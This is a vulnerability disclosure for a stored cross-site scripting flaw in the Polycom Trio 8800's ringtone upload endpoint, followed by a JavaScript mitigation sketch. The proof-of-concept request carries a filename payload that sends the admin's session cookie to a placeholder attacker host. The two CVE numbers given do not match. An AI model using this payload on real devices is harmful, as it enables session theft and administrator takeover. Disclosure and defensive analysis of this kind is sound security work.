Polycom Trio 8800 Vulnerability Disclosure

Jan 19, 2023

Proof of Concept:

Stored Cross Site Scripting (CVE-2023-24282):

POST /form-submit/Preferences/Ringtone/upload HTTP/1.1
Host: 10.26.222.125
Cookie: session=00000003-JL7azBc2p7bexJaAKqvCYVCG15HubMz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------109391813519434785531297386274
Content-Length: 24321
Origin: https://10.26.222.125
Referer: https://10.26.222.125/index.htm
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------109391813519434785531297386274
Content-Disposition: form-data; name="383:2"; filename="'><img src=1 onerror=this.src='http:\x2F\x2FAttacker-IP\x2F?c='+document.cookie>.wav"
Content-Type: audio/x-wav

RIFF WAVEfmt
…SNIP…


Mitre Reference:


CVE-2022-37718

Vulnerability Type: Cross Site Scripting (XSS)
Vendor of Product: Polycom
Affected Product Code Base: Trio 8800 - 7.2.2.1094
Affected Component: Web Management Interface
Description: The Web Management Interface of Polycom Trio 8800 was discovered to contain a stored cross site scripting vulnerability. This vulnerability allows injection of arbitrary JavaScript and administrator takeover.
Attack Vectors: A remote authenticated attacker can inject malicious JavaScript code by sending a specially crafted request to the Polycom Trio’s ringtone management endpoint.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true
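
Mitigation sketch: the two controls that close this class of bug on the ringtone upload path, added here as an illustration and not taken from the vendor's firmware or the original disclosure. It assumes the stored filename is later written into a single-quoted HTML attribute (suggested by the leading '> in the request's filename); all function names are hypothetical and the sample part headers are constructed.

```javascript
// Added illustration; not Polycom firmware code. All function names are hypothetical.

// Allowlist for stored ringtone names: letters, digits, space, dot, dash, underscore.
const SAFE_NAME = /^[A-Za-z0-9][A-Za-z0-9 ._-]{0,63}\.wav$/;

// Pull the client-supplied filename out of a multipart part header.
function filenameFromDisposition(header) {
  const m = /filename="((?:[^"\\]|\\.)*)"/i.exec(header);
  return m ? m[1] : null;
}

// Input-side control: refuse anything outside the allowlist before storing it.
function isAcceptableRingtoneName(name) {
  return typeof name === 'string' && SAFE_NAME.test(name);
}

// Output-side control: encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Weak form (assumed): the stored name is concatenated straight into markup.
function renderRingtoneUnsafe(name) {
  return "<option value='" + name + "'>" + name + "</option>";
}

// Hardened form: the same markup with every interpolation encoded.
function renderRingtoneSafe(name) {
  const n = escapeHtml(name);
  return "<option value='" + n + "'>" + n + "</option>";
}

// Constructed part headers (benign markup only) using the field name from the request.
const SAMPLE_HEADERS = [
  'Content-Disposition: form-data; name="383:2"; filename="chime_01.wav"',
  'Content-Disposition: form-data; name="383:2"; filename="\'><b>x</b>.wav"',
];

// Triage each upload: what the server should decide and what each renderer emits.
function triage(headers) {
  return headers.map((h) => {
    const name = filenameFromDisposition(h);
    return { name, accepted: isAcceptableRingtoneName(name),
             unsafe: renderRingtoneUnsafe(name), safe: renderRingtoneSafe(name) };
  });
}

console.log(triage(SAMPLE_HEADERS));
```

Either control alone stops the markup from reaching the administrator's browser; applying both means a name that slips past validation is still rendered as inert text.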


Timeline:


19/01/23 - initial contact disclosure